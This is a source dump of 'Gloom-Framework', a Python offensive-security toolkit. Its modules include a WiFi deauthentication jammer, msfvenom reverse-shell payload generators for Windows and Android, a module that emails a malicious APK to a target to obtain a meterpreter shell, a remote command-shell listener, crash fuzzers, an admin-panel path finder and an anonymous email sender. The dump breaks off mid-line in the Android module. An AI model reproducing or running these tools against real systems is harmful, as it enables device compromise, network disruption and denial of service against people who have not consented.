├── core ├── ipresolver.py ├── whois.py ├── geoip.py ├── portscanner.py ├── wifijammer.py ├── adminfinder.py ├── payloadgen.py ├── checkbreach.py ├── landiscover.py ├── listener.py ├── banner.py ├── wafdetection.py ├── anon_email.py ├── fuzzer.py ├── link.txt └── android_attack.py ├── install.py ├── README.md ├── .gitignore ├── link.txt ├── gloom.py └── LICENSE /core/ipresolver.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import socket 4 | import time 5 | from termcolor import colored, cprint 6 | 7 | def ResolveIP(): 8 | CORE_STRING = colored("[ip_resolver]", 'blue') 9 | TARGET = raw_input(CORE_STRING + " Website> ") 10 | 11 | try: 12 | ADDRESS = socket.gethostbyname(TARGET) 13 | 14 | except socket.gaierror as sock_error: 15 | cprint(str(sock_error), 'red') 16 | 17 | time.sleep(1) 18 | print "\n[*] IP Address> " + colored(ADDRESS, 'green') 19 | 20 | 21 | -------------------------------------------------------------------------------- /core/whois.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | import time 4 | import pythonwhois 5 | from termcolor import colored, cprint 6 | 7 | ''' 8 | This File Will Let use use Whois on websites. 9 | ''' 10 | 11 | def findwhois(): 12 | os.system('clear') 13 | CORE_STRING = colored("[web_whois]", 'blue') 14 | TARGET = raw_input(CORE_STRING + " Website> ") 15 | domains = [TARGET] 16 | for dom in domains: 17 | details = pythonwhois.get_whois(dom) 18 | print details['contacts']['registrant'] 19 | 20 | -------------------------------------------------------------------------------- /core/geoip.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import time 4 | import urllib2 5 | import socket 6 | from termcolor import colored, cprint 7 | 8 | def geolocate(): 9 | CORE_STRING = colored("[ip_geolocation]", 'blue') 10 | 11 | ip_addr = raw_input(CORE_STRING + " IP Address> ") 12 | REVERSE_SOCKET_DNS = socket.getfqdn(ip_addr) 13 | geoip = urllib2.urlopen('http://api.hackertarget.com/geoip/?q=' 14 | +ip_addr).read().rstrip() 15 | 16 | cprint("[*] Authenticating API...", 'blue') 17 | time.sleep(1) 18 | cprint("[!] Gathering Information...", 'blue') 19 | time.sleep(1) 20 | print("\tIP Information:\n\n ") 21 | print geoip 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /core/portscanner.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import time 4 | import subprocess 5 | from termcolor import colored, cprint 6 | 7 | ''' 8 | Since Gloom Framework is in it's early development stage, 9 | A more proper Port Scanner is in the works and should be released shortly. 10 | Sorry For the Poor Notice. 11 | 12 | ''' 13 | 14 | def PortScanner(): 15 | try: 16 | CORE_STRING = colored("[port_scanner]", 'blue') 17 | WEBSITE = raw_input(CORE_STRING + " Website> ") 18 | xterm_scan = "xterm -e " + "nmap --open " + WEBSITE 19 | os.system(xterm_scan) 20 | 21 | cli_string = 'nmap --open ' + WEBSITE 22 | os.system(cli_string) 23 | 24 | except KeyboardInterrupt: 25 | cprint("\n[!] user Abort Scan!", 'red') 26 | sys.exit(0) 27 | 28 | except: 29 | pass 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /install.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | import pip 4 | import time 5 | 6 | if not os.geteuid() == 0: 7 | sys.exit('You must Run this Script as ROOT!') 8 | 9 | try: 10 | os.system('apt-get install python-pip') 11 | os.system('easy_install pip') 12 | os.system('apt-get install nmap') 13 | os.system('apt-get install curl') 14 | install = os.system("apt-get update && apt-get install -y build-essential git") 15 | install2 = os.system("cp -R gloom/ /opt/ && cp gloom.py /opt/gloom && cp run.sh /opt/gloom && cp run.sh /usr/bin/gloom && chmod +x /usr/bin/gloom") 16 | 17 | pip.main(['install', 'scapy', 'termcolor', 'urllib2', 'pythonwhois', 'requests', 'bs4', 'mechanize', 'datetime', 'email']) 18 | print("[!] Finished Installing! Run 'sudo python gloom.py' to use program.") 19 | sys.exit() 20 | 21 | except KeyboardInterrupt: 22 | sys.exit(0) 23 | 24 | except: 25 | pass 26 | -------------------------------------------------------------------------------- /core/wifijammer.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import subprocess 4 | import time 5 | import socket 6 | from scapy.all import * 7 | from termcolor import colored, cprint 8 | 9 | ''' 10 | This Modules will let us Terminate wifi Signals from our 11 | LHOST to a network. 12 | ''' 13 | 14 | def RunScapyBasicDeauthentication(): 15 | os.system('clear') 16 | CORE_STRING = colored("[wifi_jammer]", 'blue') 17 | try: 18 | NET_INTERFACE = raw_input(CORE_STRING + "Interface> ") 19 | NET_BSSID = raw_input(CORE_STRING + "BSSID> ") 20 | NET_CLIENT = 'FF:FF:FF:FF:FF:FF' 21 | 22 | except socket.error as f: 23 | print CORE_STRING + colored(str(f), 'red') 24 | 25 | except ValueError as d: 26 | print CORE_STRING + colored(str(d), 'red') 27 | 28 | except: 29 | pass 30 | 31 | DEAUTH_PACKET = RadioTap() / Dot11(addr1=NET_CLIENT, addr2=NET_BSSID, 32 | addr3=NET_BSSID) / Dot11Deauth() 33 | 34 | sendp(DEAUTH_PACKET, iface=NET_INTERFACE, count=10000, inter=0.2) 35 | 36 | -------------------------------------------------------------------------------- /core/adminfinder.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import time 4 | 5 | from urllib2 import urlopen, Request, URLError, HTTPError 6 | from termcolor import colored, cprint 7 | 8 | def findAdmin(): 9 | CORE_STRING = colored("[admin_panel_finder]", 'blue') 10 | file_var = open("link.txt", 'r') 11 | os.system('clear') 12 | 13 | TARGET = raw_input(CORE_STRING + " Website> ") 14 | cprint("\t\n[*] Availible Panels: \n\n", 'blue') 15 | 16 | while True: 17 | side_core_link = file_var.readline() 18 | if not side_core_link: 19 | break 20 | 21 | REQUEST_LINK = "http://"+TARGET+"/"+side_core_link 22 | REQUEST = Request(REQUEST_LINK) 23 | 24 | try: 25 | response = urlopen(REQUEST) 26 | 27 | except HTTPError as e: 28 | continue 29 | 30 | except URLError as w: 31 | continue 32 | 33 | except KeyboardInterrupt: 34 | cprint("\t\n[-] User Aborted Process!", 'red') 35 | sys.exit(0) 36 | 37 | else: 38 | cprint("\t[+] Success => " + REQUEST_LINK, 'green') 39 | 40 | 41 | -------------------------------------------------------------------------------- /core/payloadgen.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import time 4 | import subprocess 5 | import socket 6 | from termcolor import colored, cprint 7 | 8 | 9 | class EXEPayloads(object): 10 | 11 | def GetInputVariables(self): 12 | global CORE_STRING 13 | global HOST 14 | global PORT 15 | global sock 16 | 17 | CORE_STRING = colored("[payload_gen]", 'blue') 18 | HOST = raw_input(CORE_STRING + " LHOST> ") 19 | PORT = raw_input(CORE_STRING + " LPORT> ") 20 | 21 | payload_types = [ 22 | 23 | 'windows/meterpreter/reverse_tcp' 24 | 'windows/meterpreter/reverse_http' 25 | 26 | ] 27 | def Meterpreter(self): 28 | global HOST 29 | global PORT 30 | global CORE_STRING 31 | 32 | try: 33 | xterm_msf1 = "xterm -e msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + HOST + " LPORT=" + PORT + " -e x86/shikata_ga_nai -f exe -o ~/Desktop/payload" 34 | os.system(xterm_msf1) 35 | print CORE_STRING + " Payload Generated with Default Name 'payload.exe'" 36 | 37 | except KeyboardInterrupt: 38 | cprint("[-] User Aborted!", 'red') 39 | sys.exit(0) 40 | 41 | except: 42 | pass 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /core/checkbreach.py: -------------------------------------------------------------------------------- 1 | import os 2 | import requests 3 | import sys 4 | import time 5 | import socket 6 | import datetime 7 | import json 8 | from bs4 import BeautifulSoup 9 | from termcolor import cprint, colored 10 | 11 | class Breach(object): 12 | 13 | def RunMainCheck(self, email): 14 | email_list = [] 15 | api = "https://haveibeenpwned.com/api/v2/breachedaccount/%s?truncateResponse=true" % email 16 | time.sleep(1) 17 | 18 | print "[!] Trying to Authenticate Email: " + colored('%s', 'blue') % email 19 | r = requests.get(api,headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'}) 20 | auth_status = 200 21 | 22 | if(r.status_code == auth_status): 23 | try: 24 | pwnedSites = json.loads(r.text) 25 | for site in pwnedSites: 26 | print "[+] %s was comprimised at %s breach!" % (email, site["Name"]) 27 | email_list.append(email) 28 | 29 | except Exception: 30 | pass 31 | 32 | else: 33 | cprint("[!] Email Has Not Been Comprimised in a Breach", 'red') 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Gloom-Framework :: Linux Penetration Testing Framework 2 | ![Gloom-Framework](https://cdn.discordapp.com/attachments/326154623784321024/350411765844017152/gloom.png) 3 | ## About Gloom 4 | - Gloom is an Open-Source Security Framework 5 | - This Framework was written in Python 6 | ### Donations? 7 | - Every Dollar Counts and goes towards better Development 8 | - Paypal -> https://paypal.me/joshDelta 9 | ## SSTec Tutorials Youtube 10 | Special Thanks to SSTec Tutorials for making videos on GLoom. 11 | - Video 1 12 | https://youtu.be/R_0ErWoosFY 13 | - Video 2 14 | https://youtu.be/ZTQRT1rkS8w 15 | - Video 3 16 | https://youtu.be/ILXsZoSAajI 17 | Make Sure to Check Them Out! 18 | ### Can I Fully Purchase This Framework(Take Ownership)? 19 | - Yes you can! If you want to purchase Gloom Framework, 20 | please contact -> gloomhelp5@gmail.com 21 | #### Price? 22 | - The Price for full ownership starts at $210.00 23 | - For more info, please contact the email above. 24 | ### Install Gloom 25 | #### First ``git clone`` 26 | ``git clone https://github.com/joshDelta/Gloom-Framework.git`` 27 | #### Second ``cd`` 28 | ``cd Gloom-Framework`` 29 | #### Third ``install`` 30 | ``sudo python install.py`` 31 | #### Run The Program 32 | ``sudo python gloom.py`` 33 | ## Operating Systems 34 | - Gloom-Framework is Designed For Linux 35 | ### Will Gloom work on Windows? 36 | - No, Gloom is not built for Windows 37 | ### Discord 38 | https://discord.gg/9SFvVnD 39 | 40 | -------------------------------------------------------------------------------- /core/landiscover.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import socket 4 | import time 5 | from scapy.all import * 6 | from termcolor import colored, cprint 7 | 8 | def DiscoverLiveHosts(): 9 | os.system('clear') 10 | CORE_STRING = colored("[discover_lan_hosts]", 'blue') 11 | s = socket.socket(socket.AF_PACKET, socket.SOCK_DGRAM) 12 | FORMAT_STRING = colored('\n\t\t\t ', 'cyan') 13 | live_hosts = [] 14 | NET_ID = str(raw_input(CORE_STRING + " NET ID(EXAMPLE -> 192.168.0.*)> ")) 15 | 16 | ENTER_ON_PRESS = '' 17 | if NET_ID == ENTER_ON_PRESS or NET_ID == None: 18 | cprint('[~] Please Enter Valid Input!', 'red') 19 | return DiscoverLiveHosts() 20 | 21 | else: 22 | try: 23 | TOP_VERBOSE_DEBUG = False 24 | cprint('\t[*] Starting Scan...', 'yellow') 25 | time.sleep(0.5) 26 | 27 | ARP_AS_1, UNANS = arping(NET_ID, verbose=TOP_VERBOSE_DEBUG) 28 | cprint('\t[!] Gathering Results...', 'green') 29 | time.sleep(1) 30 | 31 | cprint('\n\t[#] Live Hosts...') 32 | print FORMAT_STRING 33 | 34 | for x in ARP_AS_1: 35 | print '\t' + x[0].pdst + '\t\t'+ x[1].src 36 | if x[1] not in live_hosts: 37 | live_hosts.append(x[0].pdst) 38 | print "\n" + CORE_STRING + " %s hosts up...."%len(live_hosts) 39 | 40 | except socket.gaierror as w: 41 | cprint('\t' + str(w), 'red') 42 | time.sleep(5) 43 | cprint('\n\t[!] Returning...') 44 | return DiscoverLiveHosts() 45 | 46 | except KeyboardInterrupt: 47 | cprint("\n\t[-] User Aborted!", 'red') 48 | sys.exit(0) 49 | 50 | except: 51 | pass 52 | 53 | 54 | 55 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | 49 | # Translations 50 | *.mo 51 | *.pot 52 | 53 | # Django stuff: 54 | *.log 55 | local_settings.py 56 | 57 | # Flask stuff: 58 | instance/ 59 | .webassets-cache 60 | 61 | # Scrapy stuff: 62 | .scrapy 63 | 64 | # Sphinx documentation 65 | docs/_build/ 66 | 67 | # PyBuilder 68 | target/ 69 | 70 | # Jupyter Notebook 71 | .ipynb_checkpoints 72 | 73 | # pyenv 74 | .python-version 75 | 76 | # celery beat schedule file 77 | celerybeat-schedule 78 | 79 | # SageMath parsed files 80 | *.sage.py 81 | 82 | # dotenv 83 | .env 84 | 85 | # virtualenv 86 | .venv 87 | venv/ 88 | ENV/ 89 | 90 | # Spyder project settings 91 | .spyderproject 92 | .spyproject 93 | 94 | # Rope project settings 95 | .ropeproject 96 | 97 | # mkdocs documentation 98 | /site 99 | 100 | # mypy 101 | .mypy_cache/ 102 | -------------------------------------------------------------------------------- /core/listener.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import socket, subprocess 4 | import time 5 | from termcolor import colored, cprint 6 | 7 | def sockListen(): 8 | global CORE_STRING 9 | global host 10 | global port 11 | global s 12 | 13 | CORE_STRING = colored("[listener]", 'blue') 14 | host = '' 15 | port = int(raw_input(CORE_STRING + " Port Number> ")) 16 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | 18 | try: 19 | s.bind((host, port)) 20 | cprint("[*] Binding Socket To Port...", 'green') 21 | time.sleep(1) 22 | 23 | except socket.error as y: 24 | cprint(str(y), 'red') 25 | 26 | s.listen(10) 27 | cprint("[!] Listening For Incoming Connections/Intervals...", 'green') 28 | 29 | def sockAccept(): 30 | global s 31 | global CORE_STRING 32 | 33 | try: 34 | while True: 35 | conn, addr = s.accept() 36 | print CORE_STRING + "Connection With: " + str(addr[0]) + ":" + str(addr[1]) 37 | break_ = raw_input(CORE_STRING + " Would You like to Stop Listening To Connections[yes/no]> ") 38 | if break_ == "yes" or break_ == "y" or break_ == "Y" or break_ == "Yes": 39 | break 40 | 41 | else: 42 | continue 43 | 44 | except socket.error as w: 45 | cprint(str(w), 'red') 46 | 47 | except KeyboardInterrupt as y: 48 | cprint(str(y), 'red') 49 | sys.exit(0) 50 | 51 | except: 52 | pass 53 | 54 | def CommandShell(): 55 | data = s.recv(1024) 56 | 57 | if data.strip() == "exit": 58 | sys.exit(0) 59 | 60 | PROC = subrocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 61 | OUTPUT = PROC.stdout.read() + PROC.stderr.read() 62 | s.send(OUTPUT) 63 | s.send("Shell> ") 64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /core/banner.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import time 4 | import random 5 | from termcolor import colored, cprint 6 | 7 | def load_banner(): 8 | """ 9 | This Function allows me to randomly load banners 10 | for the main program. 11 | 12 | """ 13 | 14 | banner1 = colored(''' 15 | 16 | 17 | ________.__ 18 | / _____/| | ____ ____ _____ 19 | / \ ___| | / _ \ / _ \ / \ 20 | \ \_\ \ |_( <_> | <_> ) Y Y \ 21 | \______ /____/ \____/ \____/|__|_| / 22 | \/ \/ 23 | 24 | - Security Framework 25 | 26 | ''', 'green') 27 | 28 | banner2 = colored(''' 29 | 30 | 31 | >===> >=> 32 | >> >=> >=> 33 | >=> >=> >=> >=> >===>>=>>==> 34 | >=> >=> >=> >=> >=> >=> >=> >> >=> 35 | >=> >===> >=> >=> >=> >=> >=> >=> >> >=> 36 | >=> >> >=> >=> >=> >=> >=> >=> >> >=> 37 | >====> >==> >=> >=> >==> >> >=> 38 | 39 | 40 | :: Framework :: 41 | 42 | ''', 'yellow') 43 | 44 | banner3 = colored(''' 45 | 46 | 47 | ___________ ________________________ 48 | 7 77 7 7 77 77 7 49 | | __!| | | 7 || 7 || _ _ | 50 | | ! 7| !___| | || | || 7 7 | 51 | | || 7| ! || ! || | | | 52 | !_____!!_____!!_____!!_____!!__!__!__! 53 | 54 | 55 | ''', 'red') 56 | 57 | 58 | headers = [banner1, banner2, banner3] 59 | random_choice = headers[random.randint(0, 2)] 60 | print random_choice 61 | 62 | 63 | -------------------------------------------------------------------------------- /core/wafdetection.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import time 4 | from urllib2 import Request, urlopen, URLError, HTTPError 5 | from termcolor import colored, cprint 6 | 7 | def RunDetection(): 8 | CORE_STRING = colored('[waf_detection]', 'blue') 9 | try: 10 | link = raw_input(CORE_STRING + " Website> ") 11 | waf = 0 12 | WAF_REQ_LINK = "http://"+link 13 | WAF_REQ = Request(WAF_REQ_LINK) 14 | f = urlopen(WAF_REQ_LINK) 15 | waf_response = f.read() 16 | if waf_response is HTTPError or '__cfduid' in waf_response: 17 | print colored("[+]", "green", attrs=['bold']) + "Cloud_Flare .. [" + colored("Detected", "green", attrs=['bold']) + "]" 18 | waf = True 19 | waf += 1 20 | 21 | else: 22 | print colored("[-]", "green", attrs=['bold']) + "Cloud_Flare .. [" + colored("None", "red", attrs=['bold']) + "]" 23 | waf = False 24 | waf -= 1 25 | 26 | if "Just a moment..." in waf_response or "wait" in waf_response or "Please" in waf_response or "please" in waf_response: 27 | print colored("[+]", "green", attrs=['bold']) + "Bot_Protection .. [" + colored("Detected", "green", attrs=['bold']) + "]" 28 | waf = True 29 | waf += 1 30 | 31 | else: 32 | print colored("[-]", "green", attrs=['bold']) + "Bot_Protection .. [" + colored("None", "red", attrs=['bold']) + "]" 33 | waf -= 1 34 | waf = False 35 | 36 | except KeyboardInterrupt: 37 | cprint("\n\t[!] User Aborted Scan! ", 'red') 38 | sys.exit(0) 39 | 40 | except URLError as g: 41 | print(CORE_STRING + colored(str(g), 'red')) 42 | 43 | except HTTPError as w: 44 | print(CORE_STRING + colored(str(w), 'red')) 45 | 46 | except: 47 | pass 48 | 49 | ''' 50 | Lets Run some other checks for basic information 51 | 52 | ''' 53 | response = urlopen(WAF_REQ_LINK) 54 | url = response.geturl() 55 | print "\n" 56 | print "-" * 40 57 | print "RESPONSE: " + colored(response, 'blue') 58 | print "URL: " + colored(url, 'blue') 59 | 60 | headers = response.info() 61 | print 'DATE: ' + colored(headers['date'], 'blue') 62 | print 'HEADERS: \n' 63 | print colored(headers, 'blue') 64 | print "\n%s Headers" %len(headers) 65 | 66 | data = response.read() 67 | print 'LENGTH :', len(data) 68 | print '-' * 40 69 | 70 | 71 | -------------------------------------------------------------------------------- /core/anon_email.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import time 4 | import mechanize 5 | from termcolor import colored, cprint 6 | 7 | class AnonEmail: 8 | 9 | def __init__(self): 10 | self.CORE_STRING = colored("[anon_email]", 'blue') 11 | self.INFO_STRING = colored("[anon_email]", 'green') 12 | self.browser = mechanize.Browser() 13 | 14 | self.TARGET = raw_input(self.CORE_STRING + " Recipient's Email> ") 15 | self.SUBJECT = raw_input(self.CORE_STRING + " Subject> ") 16 | self.MESSAGE = raw_input(self.CORE_STRING + " Message> ") 17 | 18 | def SendAnonEmail(self): 19 | 20 | for x in range(1): 21 | if self.TARGET == '' or None: 22 | cprint("[!] Enter Valid Input", 'red') 23 | break 24 | else: 25 | pass 26 | 27 | print self.CORE_STRING + " [!] Writing..." 28 | time.sleep(0.66) 29 | api = "http://anonymouse.org/anonemail.html" 30 | headers = "Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)" 31 | self.browser.addheaders = [('User-agent', headers)] 32 | 33 | self.browser.open(api) 34 | self.browser.set_handle_equiv(True) 35 | self.browser.set_handle_gzip(True) 36 | self.browser.set_handle_redirect(True) 37 | self.browser.set_handle_referer(True) 38 | self.browser.set_handle_robots(False) 39 | self.browser.set_debug_http(False) 40 | self.browser.set_debug_redirects(False) 41 | self.browser.select_form(nr=0) 42 | 43 | self.browser.form['to'] = self.TARGET 44 | self.browser.form['subject'] = self.SUBJECT 45 | self.browser.form['text'] = self.MESSAGE 46 | 47 | try: 48 | result = self.browser.submit() 49 | response = self.browser.response().read() 50 | 51 | except mechanize.HTTPDefaultErrorHandler as ix: 52 | print self.CORE_STRING + colored(ix, 'red') 53 | 54 | except: 55 | pass 56 | 57 | main_repo = "The e-mail has been sent anonymously!" 58 | 59 | if "The e-mail has been sent anonymously!" in response or main_repo in response: 60 | print "\n" + self.INFO_STRING + " The email has been sent successfully." 61 | print self.INFO_STRING + " Mail Should be Recieved Shortly." 62 | 63 | else: 64 | print self.CORE_STRING + " Failed to send email!" 65 | 66 | 67 | -------------------------------------------------------------------------------- /core/fuzzer.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import socket 4 | import time 5 | from termcolor import colored, cprint 6 | 7 | 8 | class Fuzzer(object): 9 | 10 | def TCPFuzzer(self): 11 | os.system('clear') 12 | CORE_STRING = colored("[tcp_fuzzer]", 'blue') 13 | host = raw_input(CORE_STRING + " Host> ") 14 | buffer_ = 'x41' * 2048 15 | 16 | while True: 17 | try: 18 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | s.connect((host, 443)) 20 | s.settimeout(2) 21 | 22 | print "[!] Sending Buffer Size of: " + colored(str(len(buffer_)), 'blue') 23 | s.send("USER: "+buffer_+"\r\n") 24 | time.sleep(2) 25 | 26 | buffer_ = buffer_ + 'x41' * 2048 27 | 28 | except socket.error as wn: 29 | cprint("[+] Service Crashed With Buffer Size Of: " + str(len(buffer_)), 'green') 30 | break 31 | 32 | except KeyboardInterrupt: 33 | cprint("[-] User Aborted Fuzz!", 'red') 34 | sys.exit(1) 35 | 36 | except: 37 | continue 38 | 39 | def FTPFuzzer(self): 40 | os.system('clear') 41 | CORE_STRING = colored("[ftp_fuzzer]", 'blue') 42 | host = raw_input(CORE_STRING + " Host> ") 43 | buffer_ = 'x41' * 2048 44 | 45 | while True: 46 | try: 47 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 48 | s.connect((host, 21)) 49 | s.settimeout(2) 50 | 51 | print "[!] Sending Buffer Size of: " + colored(str(len(buffer_)), 'blue') 52 | s.send("USER: "+buffer_+"\r\n") 53 | time.sleep(2) 54 | 55 | buffer_ = buffer_ + 'x41' * 2048 56 | 57 | except socket.error as wn: 58 | cprint("[+] Service Crashed With Buffer Size Of: " + str(len(buffer_)), 'green') 59 | break 60 | 61 | except KeyboardInterrupt: 62 | cprint("[-] User Aborted Fuzz!", 'red') 63 | sys.exit() 64 | 65 | except: 66 | continue 67 | 68 | def HTTPFuzzer(self): 69 | os.system('clear') 70 | CORE_STRING = colored("[http_fuzzer]", 'blue') 71 | host = raw_input(CORE_STRING + " Host> ") 72 | buffer_ = 'x41' * 2048 73 | 74 | HTTP_BASE_SIZE_ = 3333 75 | while True: 76 | try: 77 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 78 | s.connect((host, 80)) 79 | s.settimeout(2) 80 | 81 | print "[!] Sending Buffer Size of: " + colored(str(len(buffer_)), 'blue') 82 | s.send("USER: "+buffer_+"\r\n") 83 | s.send("\tGET /" + str(HTTP_BASE_SIZE_) + " HTTP/1.1\r\n") 84 | s.send("\tHOST: " + host + "\r\n\r\n"); 85 | time.sleep(2) 86 | 87 | buffer_ = buffer_ + 'x41' * 2048 88 | 89 | except socket.error as wn: 90 | cprint("[+] Service Crashed With Buffer Size Of: " + str(len(buffer_)), 'green') 91 | break 92 | 93 | except KeyboardInterrupt: 94 | cprint("[-] User Aborted Fuzz!", 'red') 95 | sys.exit() 96 | 97 | except: 98 | continue 99 | 100 | 101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /link.txt: -------------------------------------------------------------------------------- 1 | admin.php 2 | admin.html 3 | index.php 4 | login.php 5 | login.html 6 | administrator 7 | admin 8 | adminpanel 9 | cpanel 10 | login 11 | wp-login.php 12 | administrator 13 | admins 14 | logins 15 | admin.asp 16 | login.asp 17 | adm/ 18 | admin/ 19 | admin/account.html 20 | admin/login.html 21 | admin/login.htm 22 | admin/controlpanel.html 23 | admin/controlpanel.htm 24 | admin/adminLogin.html 25 | admin/adminLogin.htm 26 | admin.htm 27 | admin.html 28 | adminitem/ 29 | adminitems/ 30 | administrator/ 31 | administrator/login.%EXT% 32 | administrator.%EXT% 33 | administration/ 34 | administration.%EXT% 35 | adminLogin/ 36 | adminlogin.%EXT% 37 | admin_area/admin.%EXT% 38 | admin_area/ 39 | admin_area/login.%EXT% 40 | manager/ 41 | superuser/ 42 | superuser.%EXT% 43 | access/ 44 | access.%EXT% 45 | sysadm/ 46 | sysadm.%EXT% 47 | superman/ 48 | supervisor/ 49 | panel.%EXT% 50 | control/ 51 | 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| login_admin%EXT% 272 | login_out/ 273 | login_out%EXT% 274 | login_user%EXT% 275 | loginerror/ 276 | loginok/ 277 | loginsave/ 278 | loginsuper/ 279 | loginsuper%EXT% 280 | login%EXT% 281 | logout/ 282 | logout%EXT% 283 | secrets/ 284 | super1/ 285 | super1%EXT% 286 | super_index%EXT% 287 | super_login%EXT% 288 | supermanager%EXT% 289 | superman%EXT% 290 | superuser%EXT% 291 | supervise/ 292 | supervise/Login%EXT% 293 | super%EXT% 294 | -------------------------------------------------------------------------------- /core/android_attack.py: -------------------------------------------------------------------------------- 1 | """ 2 | This module will let us Create an android payload 3 | and send it off to a target. When opened, we will 4 | get a meterpreter shell on that android device. 5 | 6 | 7 | """ 8 | 9 | import os 10 | import sys 11 | import time 12 | import smtplib 13 | import subprocess 14 | from getpass import getpass 15 | from termcolor import colored, cprint 16 | from email.mime.application import MIMEApplication 17 | from email.mime.multipart import MIMEMultipart 18 | from email.mime.text import MIMEText 19 | from email.MIMEBase import MIMEBase 20 | 21 | class SMS(object): 22 | 23 | def __init__(self): ### Collecting Important Input Variables 24 | os.system('clear') 25 | self.CORE_STRING = colored("[android_attack]", 'blue') 26 | self.INFO_STRING = colored("[android_attack]", 'green') 27 | self.ERROR_STRING = colored("[android_attack_error]", 'red') 28 | self.smtp = smtplib.SMTP("smtp.gmail.com", 587) 29 | 30 | self.TARGET = raw_input(self.CORE_STRING + " Target Email Address: ") 31 | self.GMAIL = raw_input(self.CORE_STRING + " Your Gmail Address: ") 32 | self.PASSWORD = getpass(self.CORE_STRING + " Password: ") 33 | self.PAYLOAD_NAME = raw_input(self.CORE_STRING + " Payload Name: ") 34 | self.PAYLOAD_TYPE = raw_input(self.CORE_STRING + " [1] reverse_tcp [2] reverse_http: ") 35 | os.system('clear') 36 | self.LHOST = raw_input(self.CORE_STRING + " LHOST: ") 37 | self.LPORT = raw_input(self.CORE_STRING + " LPORT: ") 38 | os.system('clear') 39 | self.SUBJECT = raw_input(self.CORE_STRING + " Subject: ") 40 | self.MAIN_MESSAGE = raw_input(self.CORE_STRING + " Main Email Message(Body): ") 41 | 42 | self.IS_SENT = False 43 | self.IS_LOGGED_IN = False 44 | self.CONNECTED_TLS = False 45 | self.IS_PAYLOAD_GENERATED = False 46 | self.CALL_METASPLOIT = False 47 | self.GET_INPUT_VARS = True 48 | self.RUN_WITHOUT_ERROR_CODE_1_ = False 49 | self.SMTP_AUTHENTICATION_ERROR = False 50 | 51 | 52 | def do_login(self): 53 | self.smtp.starttls() 54 | self.CONNECTED_TLS = True 55 | 56 | print self.CORE_STRING + " Attepting Sign In..." 57 | try: 58 | self.IS_LOGGED_IN = True 59 | self.smtp.login(self.GMAIL, self.PASSWORD) 60 | time.sleep(1) 61 | print self.INFO_STRING + " Logged In!" 62 | time.sleep(0.57) 63 | ## ATTEMPTING SMTP LOGIN 64 | 65 | except smtplib.SMTPAuthenticationError: 66 | self.SMTP_AUTHENTICATION_ERROR = True 67 | print self.ERROR_STRING + "SMTP Login Error :: Could Not Validate Credentials." 68 | return False 69 | sys.exit(1) 70 | 71 | except: 72 | pass 73 | 74 | def do_payload(self): 75 | """ 76 | ANDROID PAYLOAD(TCP) -> android/meterpreter/reverse_tcp 77 | ANDROID PAYLOAD(HTTP) -> android/meterpreter/reverse_http 78 | """ 79 | 80 | reverse_tcp = ("xterm -e msfvenom -p android/meterpreter/reverse_tcp LHOST="+ self.LHOST +" LPORT="+self.LPORT+ 81 | " -o ~/Gloom-Framework/core/"+self.PAYLOAD_NAME+".apk") 82 | 83 | reverse_http = ("xterm -e msfvenom -p android/meterpreter/reverse_http LHOST="+ self.LHOST +" LPORT="+self.LPORT+ 84 | " -o ~/Gloom-Framework/core/"+self.PAYLOAD_NAME+".apk") 85 | 86 | if self.PAYLOAD_TYPE == '1': 87 | print self.CORE_STRING + " Generating .apk Payload..." 88 | print self.CORE_STRING + " Please Wait" 89 | os.system(reverse_tcp) 90 | 91 | elif self.PAYLOAD_TYPE == '2': 92 | print self.CORE_STRING + " Generating .apk Payload..." 93 | print self.CORE_STRING + " Please Wait" 94 | os.system(reverse_http) 95 | 96 | self.IS_PAYLOAD_GENERATED = True 97 | print self.INFO_STRING + " Payload Created! Awaiting To Be Sent Off To 